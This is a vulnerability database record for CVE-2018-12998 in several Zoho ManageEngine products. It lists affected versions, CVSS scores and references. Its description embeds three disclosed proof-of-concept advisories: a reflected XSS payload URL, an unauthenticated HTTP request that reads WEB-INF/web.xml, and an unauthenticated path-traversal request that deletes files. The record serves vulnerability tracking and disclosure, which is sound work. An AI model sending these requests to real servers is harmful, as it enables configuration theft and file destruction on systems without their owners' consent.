var-201806-1164
Vulnerability from variot
A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. plural Zoho ManageEngine The product contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. There are cross-site scripting vulnerabilities in many ZOHO products. This issue has been reported to the vendor who has already published patches for this issue. https://www.manageengine.com/products/applications_manager/issues.html
========================== Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability Author: M3 From DBAppSecurity Affected Version: All ========================== Proof of Concept: ========================== /GraphicalView.do?method=createBusinessService"scriptalert(5045)/script
Notice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. http://opmanager.helpdocsonline.com/read-me
========================== Advisory:Zoho manageengine Arbitrary File Read in multiple Products Author: M3 From DBAppSecurity Affected Products: Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer ========================== Proof of Concept: ========================== POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx
Notice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.
========================== Advisory: Zoho manageengine Desktop Central Arbitrary File Deletion Author: M3 From DBAppSecurity Affected Products:Desktop Central ========================== Proof of Concept: ==========================
POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif
Notice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "firewall analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine netflow analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine opmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine network configuration manager",
"scope": "eq",
"trust": 1.0,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine oputils",
"scope": "eq",
"trust": 1.0,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "manageengine firewall analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123147"
},
{
"_id": null,
"model": "manageengine netflow analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123137"
},
{
"_id": null,
"model": "manageengine network configuration manager",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123128"
},
{
"_id": null,
"model": "manageengine opmanager",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123148"
},
{
"_id": null,
"model": "manageengine oputils",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123161"
},
{
"_id": null,
"model": "network configuration manager",
"scope": "eq",
"trust": 0.6,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "oputils",
"scope": "eq",
"trust": 0.6,
"vendor": "zohocorp",
"version": null
},
{
"_id": null,
"model": "opmanager",
"scope": "eq",
"trust": 0.6,
"vendor": "zohocorp",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006785"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-036"
},
{
"db": "NVD",
"id": "CVE-2018-12998"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:zohocorp:manageengine_firewall_analyzer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:zohocorp:manageengine_netflow_analyzer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:zohocorp:network_configuration_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:zohocorp:manageengine_opmanager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:zohocorp:oputils",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006785"
}
]
},
"credits": {
"_id": null,
"data": "Xiaotian Wang",
"sources": [
{
"db": "PACKETSTORM",
"id": "148635"
}
],
"trust": 0.1
},
"cve": "CVE-2018-12998",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2018-12998",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-123013",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-12998",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-12998",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-12998",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-12998",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-036",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-123013",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-12998",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123013"
},
{
"db": "VULMON",
"id": "CVE-2018-12998"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006785"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-036"
},
{
"db": "NVD",
"id": "CVE-2018-12998"
}
]
},
"description": {
"_id": null,
"data": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. plural Zoho ManageEngine The product contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. There are cross-site scripting vulnerabilities in many ZOHO products. This issue has been reported to the vendor who has already published patches for this issue. \nhttps://www.manageengine.com/products/applications_manager/issues.html\n\n\n==========================\nAdvisory:Zoho manageengine Applications Manager Reflected XSSVulnerability\nAuthor: M3 From DBAppSecurity\nAffected Version: All\n==========================\nProof of Concept:\n==========================\n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script\n\n\nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me\n\n\n==========================\nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products\nAuthor: M3 From DBAppSecurity\nAffected Products:\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\n==========================\nProof of Concept:\n==========================\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx\n\n\nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. \n\n\n\n\n==========================\nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion\nAuthor: M3 From DBAppSecurity\nAffected Products:Desktop Central\n==========================\nProof of Concept:\n==========================\n\n\nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif\n\n\nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-12998"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006785"
},
{
"db": "VULHUB",
"id": "VHN-123013"
},
{
"db": "VULMON",
"id": "CVE-2018-12998"
},
{
"db": "PACKETSTORM",
"id": "148635"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2018-12998",
"trust": 2.7
},
{
"db": "CNNVD",
"id": "CNNVD-201807-036",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "148635",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006785",
"trust": 0.8
},
{
"db": "VULHUB",
"id": "VHN-123013",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-12998",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123013"
},
{
"db": "VULMON",
"id": "CVE-2018-12998"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006785"
},
{
"db": "PACKETSTORM",
"id": "148635"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-036"
},
{
"db": "NVD",
"id": "CVE-2018-12998"
}
]
},
"id": "VAR-201806-1164",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-123013"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T21:53:05.236000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.manageengine.com/"
},
{
"title": "Multiple ZOHO Fixes for product cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81655"
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/ARPSyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-12998"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006785"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-036"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123013"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006785"
},
{
"db": "NVD",
"id": "CVE-2018-12998"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "https://github.com/unh3x/just4cve/issues/10"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2018/jul/75"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/148635/zoho-manageengine-13-13790-build-xss-file-read-file-deletion.html"
},
{
"trust": 1.8,
"url": "http://www.cnnvd.org.cn/web/xxk/ldxqbyid.tag?cnnvd=cnnvd-201807-036"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12998"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12998"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12999"
},
{
"trust": 0.1,
"url": "https://www.manageengine.com/products/applications_manager/issues.html"
},
{
"trust": 0.1,
"url": "http://opmanager.helpdocsonline.com/read-me"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12997"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12996"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123013"
},
{
"db": "VULMON",
"id": "CVE-2018-12998"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006785"
},
{
"db": "PACKETSTORM",
"id": "148635"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-036"
},
{
"db": "NVD",
"id": "CVE-2018-12998"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-123013",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2018-12998",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006785",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "148635",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201807-036",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2018-12998",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2018-06-29T00:00:00",
"db": "VULHUB",
"id": "VHN-123013",
"ident": null
},
{
"date": "2018-06-29T00:00:00",
"db": "VULMON",
"id": "CVE-2018-12998",
"ident": null
},
{
"date": "2018-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006785",
"ident": null
},
{
"date": "2018-07-22T17:22:56",
"db": "PACKETSTORM",
"id": "148635",
"ident": null
},
{
"date": "2018-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-036",
"ident": null
},
{
"date": "2018-06-29T12:29:00.500000",
"db": "NVD",
"id": "CVE-2018-12998",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "VULHUB",
"id": "VHN-123013",
"ident": null
},
{
"date": "2023-12-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-12998",
"ident": null
},
{
"date": "2018-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006785",
"ident": null
},
{
"date": "2021-09-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-036",
"ident": null
},
{
"date": "2024-11-21T03:46:13.193000",
"db": "NVD",
"id": "CVE-2018-12998",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-036"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "plural Zoho ManageEngine Product cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006785"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "148635"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-036"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.